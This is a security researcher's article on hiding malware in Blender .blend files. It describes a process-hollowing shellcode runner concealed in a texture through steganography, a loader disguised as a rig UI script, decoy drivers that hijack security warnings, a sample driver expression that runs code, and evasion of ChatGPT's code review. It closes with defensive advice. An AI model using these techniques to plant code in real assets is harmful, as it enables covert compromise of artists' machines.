Pixels, Polygons, and Payloads:
Malware delivery in 3D software pipelines
)
- Oliver Simonnet
- Lead Security Researcher
- Read time
- Date
Table of Contents
)
- Oliver Simonnet
- Lead Security Researcher
- Read time
- Date
Executive Summary
This research explores an unconventional malware delivery vector, demonstrating how trusted creative software tools can be repurposed to deliver payloads in ways that bypass common defences, user expectations, and AI-based analysis. The work concludes with the creation of a successful Proof-of-Concept (PoC) for code execution and AV/EDR evasion using the open-source 3D software suite Blender, as can be seen below:
The research does not uncover, abuse, or rely on any software vulnerabilities in the Blender platform itself; instead, it leverages the software’s legitimate Python scripting capabilities (widely used in professional CGI workflows) to execute custom code unexpectedly. Its success capitalises on typical expectations within a niche industry where script auto-execution is often enabled by default, and security warnings are commonplace and expected. However, the research also finds that even with warnings enabled, attacks can divert user attention and conceal malicious routines within warning overrides and plausible and fully native API usage.
While many traditional code execution vectors are well understood and mitigated, this research highlights how attacker creativity can exploit overlooked workflows and the implicit trust placed in niche tools within specialised industries.
Introduction
I’ve always had a passion for animation. I spent years as a hobbyist 3D artist, worked as a freelance technical animator, and even did a short stint in vehicle design. These days, my career is firmly rooted in cyber security. But I’ve always been keen to find a way to have these two worlds intersect.
That led me to a question: Historically my work has been in the finance and tech sectors, but if a threat actor were targeting the media or animation industry, would a malicious 3D asset file (like a model, character rig, or scene file) be more effective than the usual malware-laden Word document, PDF, or Excel add-in, etc?
Traditional attack vectors, such as office suite exploitation, are well-known and increasingly well-defended against. In contrast, a 3D asset file with an embedded malicious script might slip past both the user and security controls far more easily, simply because it’s unexpected – or maybe even because it is expected.
With that in mind, I set out to explore how practical this might be and see how vulnerable the media and animation industries are to this kind of threat with what I had access to.
This research article dissects this idea, compares it with conventional malware delivery techniques, and walks through the creation a benign-looking Remote Code Execution (RCE) exploit leveraging native Blender API calls and forged warning messages to avoid suspicion and detection.
The Usual Tradecraft
Over the years, attackers have developed many ways to trick users into executing malicious code. To set the stage, before diving into 3D software, I will recap some of the common malware delivery vectors and how, we as defenders, have responded.
Office Macros
The classic. Malicious Office documents with embedded macros were running rampant for decades. While still in use, modern versions of Microsoft Office and mature enterprise policies have made this technique significantly more complicated to exploit, though not impossible:
)
Files downloaded from the internet are now tagged with a Mark-of-the-Web, which disables macros by default, and any attempt to enable them prompts multiple security warnings. As a result, most organisations now treat macro-enabled documents (.docm
, .xlsm
, etc.) with high suspicion or block them entirely.
That said, bypasses exist, and macros remain a viable technique in many environments. The success rate may have decreased, but the technique hasn’t gone anywhere, especially when targeting organisations with more lax security controls.
HTA (HTML Applications)
HTA files are another well-known method for malware delivery. These allow the execution of VBScript and JScript outside of a browser environment using Microsoft’s mshta.exe. In practice, they are written much like a macro-enabled document, but without the need for Office.
This technique has been around a long time and is often combined with other tradecraft, such as malicious LNK files and HTML smuggling to achieve code execution and evade detection:
)
However, HTA files are less commonly encountered by the average user, which could raise suspicions, as it is not an everyday format. That said, it still remains a valid and common “living off the land” technique for attackers looking to avoid macro-related defences.
Excel Add-ins (XLLs)
As Microsoft tightened macro security, threat actors also adapted and started using precompiled custom Excel add-in files (.xll
) as a macro-free alternative. This shift was noted in the early 2020’s with reports finding that both APT groups and commodity malware campaigns increasingly used XLL attachments in phishing attacks.
When opened, Excel will prompt the user to install the add-in. If the user accepts, the XLL file executes native DLL-based code within the Excel process. To the user, opening the file may appear like opening a typical spreadsheet, adding to its deceptive potential, whilst in the background custom malware is executed:
)
Microsoft has, however, since begun blocking untrusted XLLs by default in newer versions of Office, helping mitigate this attack vector and forcing attackers to get more creative.
These more traditional, methods (and many others like LNK shortcuts, PDF exploits, etc.) form a well-established malware-delivery toolkit. However, although they are still valid delivery mechanisms, defenders have spent years learning to detect and mitigate these techniques and the element of surprise is often lost.
Scripting in Animation Software
Many creative software packages used in the animation, media, and design industries support scripting, much like macros in Office applications. Over the years, I’ve worked with several of these tools: LightWave 3D, Autodesk Maya, 3ds Max, Blender, AutoCAD, and others.
It’s easy to forget that these tools, while built for artistic workflows, often include powerful scripting capabilities to support automation and custom tool creation – which is a critical part of modern CGI production pipelines. For example:
Autodesk Maya supports MEL (
.mel
) and Python (.py
)Blender supports Python (
.py
)3ds Max supports MaxScript (
.ms
) and Python (.py
)LightWave 3D supports LScript (
.ls
) and Python (.py
)Adobe software: supports JavaScript(
.jsx
), and Python (.py
)
Although many of these software packages initially only supported proprietary scripting languages, over the years there has been a significant adoption of Python. This makes life relatively easy for people to start writing code without having to learn multiple programming languages, and also easier for attackers to target them.
For this research, I focused specifically on Blender as it’s free, open-source, and hugely popular, supports Python, and - last but not least - I’m most familiar with it. That said, the broader security implications extend to any digital content format that allows embedding and automated execution of custom code.
Blender’s Python Power
Blender introduced Python scripting in version 2.10 (way back in 2000). This marked a turning point in its development, and since then, scripting has become deeply integrated into Blender’s ecosystem. It’s now frequently used for everything from modelling automation to extension development.
Any user can open Blender’s Scripting workspace, write some Python code, and interact directly with the 3D scene and Blender UI via the Blender Python API (bpy
):
)
Although the above is a simple example, the possibilities are almost limitless. Python scripting in Blender is routinely used to streamline workflows, create custom interfaces, and integrate the software into larger production pipelines.
A classical use-case is the development of custom animation rig interfaces for complex characters. These are control panels designed to simplify rig navigation and speed up the animation workflow for complex assets with many moving parts and constraints:
)
However, this power comes with inherent risk. Because scripts operate as active code rather than static assets, they can be embedded directly within a .blend
file. These files will then carry arbitrary Python code, making them a viable malware delivery mechanism for threat actors.
This is not new knowledge, however. It has been documented for over a decade, as far back as 2009, when CVE-2009-3850 was registered to highlight that simply opening a .blend
file with an embedded script could result in code execution without explicit user consent.
Blender’s developers have since implemented a number of safeguards to reduce this risk, such as script auto-run controls, directory allow-listing, and active code warning prompts. But the fundamental capability to execute arbitrary Python code from within a project file remains. As with Office macros, it’s a feature that’s powerful in the right hands and dangerous in others.
Security Controls in Blender
So, if arbitrary code execution is possible in Blender, what prevents malicious .blend
files from causing harm?
Over time, Blender has introduced a combination of security warnings and user preferences aimed at reducing the risk of unintended code execution via embedded scripts. By default, automatic execution of Python scripts is disabled, and when a file containing an embedded scripts is opened, Blender displays the following warning:
)
This message alerts the user that there is a Python script that is registered to auto-run in the file, and that auto-run is disabled. The user can then choose to “Allow Execution” (run the embedded scripts) or “Ignore” (skip it). There is also an option to permanently enable auto-run script execution, which will enable the Auto Run Python Scripts setting under Blender’s "Save & Load" preferences:
While enabling this setting may seem ill-advised from a security standpoint, many animators and riggers regularly work with .blend
files that require scripting for rig controls, UI elements, and other automations. As a result, it is not uncommon for users in production environments to enable auto-execution for convenience.
What’s important to note is that this setting governs all areas within Blender where Python scripts can be embedded, which covers many areas and features, including:
)
*Only if the initial script that registers them is allowed to run.
Driver-Based Execution: A Quirky Edge Case
Drivers are an interesting edge case, intended for simple mathematical operations. However, with some experimentation, I found that you can use Python’s __builtins__
module to access exec()
and eval()
within these expressions to execute arbitrary code. For example, the following driver could be used to spawn calc.exe
:
var + (0.0 if builtins['exec']('import os; os.system(\'calc.exe\')') else 0.0)
Successful execution of this can be seen below:
)
This is an interesting bypass, as it essentially smuggles code inside what appears to be a basic mathematical formula. However, Blender flags any expression that strays from basic mathematical operations as a Python script, and will subsequently trigger the same auto-run warning when the file is opened - unless the user has explicitly allowed auto script execution:
)
An interesting side effect of Blender’s warning mechanism is that driver expressions take precedence in the warning display. That means, if a .blend
file contains both a script and a complex driver expression, the warning will flag and highlight the driver, not the script text block. From a malicious perspective, this can be used to help evade detection. For example, the driver expression warning could be used to distract a reviewing user from a primary malicious text block using a benign-looking, complex driver. For example:
1 + math.sqrt(var)
This does nothing useful, but it is complex enough for Blender to elevate it from driver to complex script expression and override any text block security warnings. Once the user clicks "Allow" on the driver (as it seems perfectly benign), no further warning will be shown - even if a more dangerous script is present in the file:
)
Real-World Practices: Artists and Auto-Execution
Despite Blender’s built-in protections and the technical limitations of various execution pathways, the human factor may just tip the balance in favour of attackers.
In professional environments, it is common for artists and studios to enable the “Auto Run Python Scripts” option. For many Blender users, security warnings are seen as unnecessary friction, especially when working with character rigs or other complex assets that rely on embedded scripts for legitimate purposes, such as custom UI panels, automation tools, or scene setup functions.
Over time, many artists become conditioned to ignore script warnings or disable them altogether, falling back on trust. If the file came from a colleague, a community site, or a known artist, it's assumed to be safe. This trust-based behaviour creates a false sense of security and breeds an ideal environment for threat actors.
That said, more technically inclined users or those in more security-conscious environments may choose to inspect and review embedded scripts before allowing them to run. In these cases, they’ll typically open the Text Editor Panel in Blender and review the code manually or paste it into a Generative AI tool for review. In these cases, a blatant malicious payload (e.g. a call to os.system("ransomware.exe")
) or even a suspiciously obfuscated script would likely stand out significantly from typical blender scripting practices and be flagged as malicious.
Whilst initially conducting this research, I came across little evidence of this type of attack in the wild. However, over the past months, I found at least one real-world example of malware disseminated in a .blend
file. In this case, a user on Reddit reported a seemingly innocent chair model which, when opened, executed a heavily obfuscated and clearly malicious Python script that decoded and executed a second-stage PowerShell payload.
These observations confirmed my suspicions that a Blender-based attack is not only plausible, but already happening in the wild, even if it’s not heard of very often – if at all. The next question became: could such an attack be crafted in a more sophisticated way that can evade user scrutiny, AI-based analysis, and detection by modern AV or EDR tools?
Weaponising .blend Files for Malware Distribution
Having set the stage, we can now dive into the fun of exploring how a .blend
file might be transformed into a viable malware delivery mechanism. The objective is simple:
Embed a malicious payload within a Blender file that executes with minimal detection and does not appear obviously suspicious, even under human and AI-based scrutiny.
Plan of Action:
A simplistic approach might be to embed a text block that calls os.system("malware.exe")
, with malware.exe
embedded in the Blender file mimicking the original 2009 CVE. This would indeed execute a payload, but it would also be extremely obvious and highly detectable. Any user reviewing the script would see the call immediately, and virtually all AV products would flag it, before EDR even needed to kick in.
So, a stealthier, more sophisticated method is required, comprised of multiple key goals:
Avoid obvious indicators of compromise - No direct calls to
os.system
,subprocess
, orctypes.WinDLL("kernel32").WinExec
in the Blender file’s text block. These are well-known signatures and would alert both users and AV/EDR tools.No files written to disk - The payload must execute entirely in memory. Writing to disk leaves more obvious artefacts and significantly increases the risk of detection.
Blend in with legitimate API usage - The code should only use Blender’s legitimate native APIs. This reduces suspicion and increases the chance of bypassing both manual inspection and security control heuristics.
Minimise behavioural detection - Aggressive actions such as memory allocation or manipulation using
VirtualAlloc
could trigger endpoint detection systems. These aspects should be disguised or implemented using alternative APIs.
With that in mind, the process of creating this payload can be broken into four steps:
Create the main payload – in this case this will be shellcode to launch calc.exe. However, in a real-world scenario, this could initiate a first-stage implant or ransomware payload.
Execute the shellcode in memory using a shellcode runner, without dropping files to disk.
Hide the runner within the
.blend
file to avoid exposure during code review, scanning, and heuristic detections.Trigger execution of the runner automatically using only benign-appearing, native Blender mechanisms, and redirect the user’s attention elsewhere for good measure.
Creating Custom Shellcode
An obvious first step might be to generate shellcode using MSFvenom
. However, these payloads have long been widely recognised by modern AV and EDR systems. Even if you avoid writing the payload to disk, in-memory execution of such well-known byte patterns and decoding routines is almost guaranteed to be caught.
To make this proof of concept realistic, it requires custom shellcode, written from scratch or at least heavily modified to avoid detection.
I opted to write my own bespoke shellcode, using x86_64 assembly, targeting 64-bit Windows systems (as Blender is primarily used on 64-bit Windows in most professional environments). The payload requirements are fairly simple (spawn calc.exe
), so it’s fairly easy to write and obfuscate, and it provided a clean test for code execution pathways.
As this will be injected directly into memory, a critical requirement is that the shellcode be position independent. This will allow it to execute from any memory address without hardcoded offsets. To achieve this, the shellcode can perform a Process Environment Block (PEB) walk to dynamically locate the runtime base address of kernel32.dll
, which can then be used to resolve the relative offsets to any additionally required API addresses:
)
With the address of kernel32
obtained, additional APIs could be dynamically resolved to spawn a new process, including k32.CreateProcessA
and k32.TerminateThread
:
)
Once the shellcode was written and tested, I used the Python Keystone library to assemble the opcodes and a custom encryption script to prepare them for the shellcode runner. This produced a concise binary blob of machine code instructions capable of invoking the required Windows API calls to launch calc.exe
from anywhere in memory:
)
While the actual shellcode details are not the focus here, what matters is that this payload was custom-authored, encrypted, and obfuscated. Therefore, it is unlikely to be detected by signature-based security controls.
However, shellcode on its own is inert; it lacks all of the structure that makes a PE executable run, and as such requires a dedicated runner. This is a mechanism used to allocate memory, write the payload into it, and trigger its execution.
Creating a Shellcode Runner
As Blender supports Python, the shellcode runner can be implemented using Python in combination with the ctypes
library to access the required lower-level Windows APIs. This will enable native execution within Blender’s embedded Python environment without requiring any external dependencies.
For this proof of concept, I implemented the runner using a process hollowing technique where a legitimate process is started in a suspended state, overwritten with malicious code, and then resumed. This method is relatively stealthy and can evade various behavioural detections. A high-level overview of its implementation is as follows:
Decode and decrypt the embedded shellcode using lightweight arithmetic logic.
Create a new suspended process (e.g.
notepad.exe
) usingCreateProcessW
.Query the process information with
NtQueryInformationProcess
.Read its memory and locate its entry point using
ReadProcessMemory
.Overwrite the entry point with the decrypted shellcode via
WriteProcessMemory
.Resume execution via
ResumeThread
, causing the injected shellcode to execute.
The initial setup for this process can be seen below:
)
As no part of this runner will touch the disk, it will avoid typical AV file-based detection. However, certain strings (e.g. notepad.exe
, kernel32.dll
, etc.) could be flagged by EDR systems monitoring suspicious API usage. To mitigate this, strings were hex-encoded and decoded at runtime, obfuscating the script slightly:
)
With the main components in place, the encrypted shellcode can be embedded as a byte array, and the decoding and decryption logic implemented to restore it in memory before use:
)
Once executed, the runner then proceeds to launch a suspended notepad.exe
instance, reads its entry point, writes the decrypted shellcode into that location, and resumes execution:
)
To test this, the script was run directly outside of Blender to ensure it could execute calc.exe
via the injected shellcode through successful in-memory code execution:
)
While technically effective, if stored directly inside a .blend file, this code would be easily detected, both from a technology perspective, and human analysis:
It includes raw Windows API usage and low-level memory manipulation.
It lacks any connection to Blender’s APIs or expected scripting behaviour.
The presence of obfuscated strings and binary logic is inherently suspicious.
Even a casual user might recognise that something is wrong, and a more security-aware one would almost certainly flag it as a remote access tool or malware. Additionally, storing the runner as a persistent text block inside the file makes it vulnerable to AV scanning, particularly since both the decoding logic and shellcode may raise flags, even in an encrypted format.
Hiding the Payload
This is where the real creativity began. Blender contains numerous features that could potentially aid in concealing malicious payloads. My initial idea was to encode each byte into a different shader node value somehow. However, this became very tedious to implement, and developing a hidden yet functional extraction method was impractical based on my requirements. So instead, I turned to Texture Images!
It is common for 3D asset files to embed image textures for characters and objects. This led to the idea of hiding the runner inside a texture image using steganography. By encoding the payload into the image’s pixel data, the runner would be undetectable within the .blend
file, and it wouldn’t be visible within Blender’s scripting features at all.
To test the concept, I created a simple 3D scene featuring a laptop object with a texture image UV-mapped to the screen:
)
For the steganographic technique, I implemented a Least Significant Bit (LSB) encoding tool in Python (StepSteg.py) to hide the payload one bit at a time in the LSB of an image's RGBA pixel channels. While this alters the image's file signature, the integrity of the texture image itself is not a factor in this PoC, and the visual difference is imperceptible to the human eye:
)
Although the steganography process itself is relatively straightforward, through a number of errors, I realised that I needed to account for critical differences between how Blender and standard Python libraries handle image pixel data:
Blender stores pixel data as a flat array of floating-point values (0.0–1.0) in RGBA order. It uses an OpenGL-style coordinate system, with pixel index 0 located at the bottom-left of the image with rows progress from the bottom to the top.
The Python Imaging Library (PIL), in contrast, uses a top-left origin and stores pixels as a multi-dimensional array of bytes.
To simplify development, I first implemented encoding and decoding using PIL. This allowed me to validate the concept independently of Blender using a hardcoded binary header and trailer to delimit the embedded data and ensure reliable extraction:
)
This could then be run to encode the process hollowing shellcode runner inside the screen texture PNG image using the following commands:
)
The result was a PNG image visually identical to its original counterpart but containing a Python-based shellcode runner encoded bit-by-bit within its pixels. This successfully decoupled the payload from Blender’s internal text blocks and scripting UI, reducing the risk of immediate detection when the file is downloaded or opened.
The next challenge was adapting the extraction routine to work entirely within Blender, in a manner that is not obvious, uses only native Blender APIs, and avoids the need for external libraries or suspicious system calls.
Finding a Benign Execution Path
To extract and run the payload, I first needed to identify methods within Blender that could be used to interpret additional Python code from strings, without using blatantly suspicious functions like exec()
and eval()
.
While executing Python from a string using exec("code")
is trivial, it is also highly suspicious. Calls to exec()
, eval()
, or compile()
are often monitored by AV and EDR tools, and the presence of a large base64-encoded blob passed to one of these functions would immediately raise red flags for any reviewing user.
With that in mind, I began researching Blender’s Python APIs for execution pathways that could meet these criteria. After a lot of documentation review, I had a few “viable” options:
Option 1: bpy.ops.text.run_script()
This native Blender operator executes the contents of an internal text block. However, it requires the active UI context to be a "TEXT_EDITOR" area and will fail otherwise. It also shifts the UI panel from the executing script to the target script when called, making it extremely obvious and unsuitable for stealth:
)
Option 2: bpy.utils.execfile(filepath)
This method executes an external file via Blender’s embedded Python interpreter. However, it can’t be used to interpret text blocks and would instead require writing the payload to disk, almost definitely resulting in detection and quarantine:
)
Option 3: bpy.app.driver_namespace["id"]
This dictionary allows additional functions and variables to be called within scripted expression drivers. While very interesting, this would require additional setup, such as mapping functions manually into the namespace and triggering execution from driver expressions. Technically feasible but introduces more complexity and artefacts:
)
Option 4: bpy.data.texts["id"].as_module()
This method compiles a Blender text block into a Python module, allowing functions to be invoked as if they were defined in an imported script. It works entirely in memory, doesn’t touch the disk, and integrates seamlessly into Blender’s scripting model - making it the most promising candidate:
)
This method enables a stealthy approach where the payload runner can be extracted as a string and then executed using the following native Blender API calls:
Create a new ephemeral text block in memory using
bpy.data.texts.new()
Populate it with the extracted Python shellcode runner using
from_string()
Compile it into a module using
as_module()
Invoke an embedded runner function using
module.execution_method()
Remove the text block using
remove()
This implementation avoids suspicious API calls, doesn’t touch the disk, and does not expose the payload directly in the interface. Even the naming can be designed for plausibility, e.g., calling the text block watermark_data
and the execution method validate()
could be convincing in a typical asset pipeline scenario.
Creating a Stealthy Loader Script
With a viable payload and execution method ready, the final step was to create a stealthy loader that could extract, decode, and execute the shellcode runner within Blender without raising suspicion.
First, I implemented a legitimate Rig UI script for the laptop armature within the scene to mimic the code complexity of a legitimate character rig. Following this, I needed to somehow incorporate loading code for the shellcode runner inside it. However, as Blender stores image pixel data differently from the original Python library, the first challenge was to re-implement the steganography decoding logic using Blender’s image APIs.
Since the payload had been encoded into the image texture using LSB steganography on byte-level RGBA channels, I was a bit worried that Blender’s float conversion might corrupt the least significant bits. However, this was not the case, and the original byte values could be derived reliably using a custom function that reversed Blender’s float-to-byte mapping.
Part of this logic was wrapped in a function called convert_from_opengl()
, located within the scene’s Laptop RIG_UI.py
script:
)
With pixel extraction and restructuring in place, the next step was to decode the LSB values and extract the embedded payload. A function named extract_watermark()
was implemented to scan for the payload’s binary signature, decode the pixel values, extract the LSB, and rebuild the shellcode runner as a Python string stored in the variable watermark
:
)
To avoid placing suspicious binary markers directly into the loader script, the signature string was stored as a custom property on the laptop rig armature within the scene. This blends in well as it's fairly typical for armatures and bones to have custom properties assigned:
)
Once the payload was extracted, it was dynamically inserted into a new in-memory text block named watermark_data
. This block was then compiled using as_module()
and the runner's execution method called validate()
was invoked, executing the process hollowing payload. Following this, the text block was removed to clean up the newly generated artefacts:
)
Since most Rig UI scripts are designed to run automatically when a .blend
file loads, the loader was integrated into the main()
method of the rig’s startup logic. However, immediate execution on load isn’t ideal as Blender’s UI and context may not be fully initialised. To solve this, a one-time timer was registered with a short delay of 0.1s to defer execution of validate_watermark()
until after the UI was ready:
)
This approach is both functionally sound and plausible, as the validation routine would only need to happen once when the file is opened, not repeatedly during animation or rig use. This is ensured by registering the handler only once using a top-level register_handlers()
method called within main()
:
)
Finally, the rig script itself is registered for auto-execution on file open—standard practice for character rigs using custom UI scripts. This allows the entire process to unfold seamlessly without user interaction:
)
As an optional final touch, to avoid the warning directing users to the script itself, we can add a benign complex driver somewhere in the file that will be prioritised over the text block in Blender’s security warnings:
)
This, however, is not strictly necessary as the spirit of this PoC is for it to work regardless of whether the user reviews the script or not. However, it’s a deceitful and effective technique that can be implemented and I want to raise awareness of it.
Execution of the PoC
With the loader implemented and integrated into a legitimate Rig UI script for the laptop asset, which is registered for auto-execution, the .blend file can be saved and distributed via email, a community asset marketplace, or any other similar sharing platform.
Scenario 1 – Auto-Run Scripts Disabled
When the target opens the file with Blender’s Auto-Run Python Scripts setting disabled, Blender presents a security prompt. In this PoC, the warning is intentionally orchestrated to override the text block and instead warn on the benign driver expression, rather than the Rig UI script, drawing attention away from the payload:
)
It is also unclear exactly where this driver is, which could add to the suspicion. So if an attacker opted to do this and allow the warning to highlight the actual script, the user would still be presented with an expected and benign-looking warning, considering the Rig UI script is necessary:
)
Either way, the warnings seem benign enough, as the underlying code responsible for the warning seems harmless at a glance. If the user selects “Allow Execution” in either case, no further warnings will be shown, and the payload will execute - in this case, spawning calc.exe
via process hollowing of a suspended notepad.exe
process:
Scenario 2 – Auto-Run Scripts Enabled
If the target has Auto-Run Scripts enabled, no warning is shown at all in either scenario, and the script will execute during Blender's scene initialisation. Even if the user inspects the internal text blocks, there is very little that would likely jump out as malicious behaviour due to the pretext, obfuscation, steganographic storage, and plausible native API usage.
The whole exploit chain can be summarised using the following diagram:
Validation via Event Logs
After execution, this chain of events can be identified by filtering the Windows Security event logs for Event ID 4688
(process creation) revealing the following:
First, blender.exe
creates notepad.exe
(this is the “watermark” loader executing the runner)
)
Secondly, notepad.exe
subsequently creates calc.exe
– confirming that the shellcode was successfully injected into the notepad.exe process by the runner and executed as designed:
)
Scrutinising the Payload
With the PoC created and verified, the next step was to consider what would happen if a technically minded user did inspect the text blocks before allowing script execution. This was a key part of this research, so in an attempt to simulate this, the Laptop Rig UI script was submitted to ChatGPT for review using the following prompt:
"Here is a script from a Blender file I have with a laptop rig. Is there anything suspicious, or does it look fine?"
ChatGPT responded with ten observations, none of which flagged malware or suspicious behaviour, with its conclusions stating the following:
)
Interestingly, one of the observations did focus on the watermark validation code; however, it did not flag anything related to malware or any issues around the use and risks of as_module()
:
)
This result reinforced the PoC’s strength, that using this technology and these methods, it is possible to have a loader blend well into a plausible creative workflow and remain undetected. Even if subjected to automated AI-based analysis, the malicious execution path may not be identified or highlighted as unusual.
Reflections and Recommendations
The original CVE-2009-3850 RCE issue was not a coding flaw so much as a design choice, allowing Blender to execute embedded scripts automatically. Later versions addressed this by disabling auto-execution by default and prompting for user permission.
This research does not exploit or uncover a new vulnerability; it uses Blender’s scripting feature exactly as intended, relying on human trust and plausible code to bypass suspicion, just like macro-based malware before defenders and technologies matured to mitigate them.
So, what could be done better to prevent this?
Mitigation Strategies: For Individual Users
Treat
.blend
and other complex project files with the same caution as any other executable content. If a model comes from an unknown or unsolicited source, open it in a safe, isolated environment.Keep Auto Run Python Scripts disabled. If prompted to allow execution, and you were not expecting the file to contain scripts, choose to ignore and delete any text blocks.
Manually inspect any unexpected or unknown code before enabling script execution. Use Blender’s Text Editor to review Python text blocks, and the Driver Editor to view drivers and handlers.
Mitigation Strategies: For Studios and Enterprises
Use Blender’s Trusted Paths feature to allowlist approved project directories for auto-execution. Files from Downloads or temporary folders should remain untrusted by default.
Implement Secure Web Gateways (SWG), HRM technologies, and System Policies to prevent community assets from being introduced into your production environments.
Deploy sandbox or virtual machine environments for testing community assets, if needed, before they enter the main production pipeline.
Implement pre-processing scripts to review
.blend
files for suspicious code elements before artists open them. This could include searching for high-risk keywords (e.g.ctypes
,subprocess
,as_module
,run_script
, etc) in text blocks or unusual driver expressions.Ensure antivirus/EDR tools are configured to detect unusual Blender behaviour, such as spawning new processes or calling interpreters. While
.blend
files themselves may not be scanned deeply, runtime behaviours can still be monitored to detect evidence of memory and process manipulation.
Potential Blender Improvements
The current security warnings only alert the user of one script or driver which is about to auto-execute, often without context. An improved approach could be to list all registered script assets in the file (text blocks, scripted drivers, and registered handlers) alongside their content, names, and sizes before execution. This would allow the user to see:
Which scripts will run automatically.
Which scripts exist but will not auto-run without manual activation.
How large the scripted content is.
A quick preview of its content.
This more transparent approach would give both casual users and technical reviewers a clearer view of potential risk before allowing execution. Furthermore, this would also prevent driver expressions from obscuring warnings about potentially malicious text blocks.
Conclusion
This project began as an attempt to bridge my passion for animation with my career in cyber security. It ended as a comprehensive proof of concept that even a familiar creative tool like Blender can be turned into a delivery mechanism for malicious code. By leveraging user trust, habit, and the expected workflow of 3D artists, an asset file can become a Trojan horse without ever exploiting a single software vulnerability.
The key lesson here is that the most effective attack vectors are not always zero-days or sophisticated exploits, but sometimes they are simply the repurposing of legitimate features in ways that defenders and users may not have anticipated before. In this case, Blender’s scripting capabilities are invaluable for automation and creativity, but also effective for stealthy code execution.
This PoC demonstrates that unconventional attack surfaces are often the least monitored. Security teams and users alike should extend their attention and awareness beyond traditional “enterprise” software and include any tool capable of running user-supplied code.
Whether you’re a 3D enthusiast, a freelance artist, or an animation studio IT administrator, the defensive principles remain the same:
Treat untrusted files as potentially dangerous.
Keep auto-execution safeguards in place unless there’s a clear, verified need to remove.
Inspect scripts and complex drivers before allowing them to run.
Where possible, isolate and scan assets before they enter production workflows.
The creativity that drives artistic work is the same creativity that can power cyber-attacks. By anticipating these tactics and embedding security habits and technologies into creative workflows, we can protect our art, our people, and our systems alike.
Stay safe, and keep blending, in both art and security.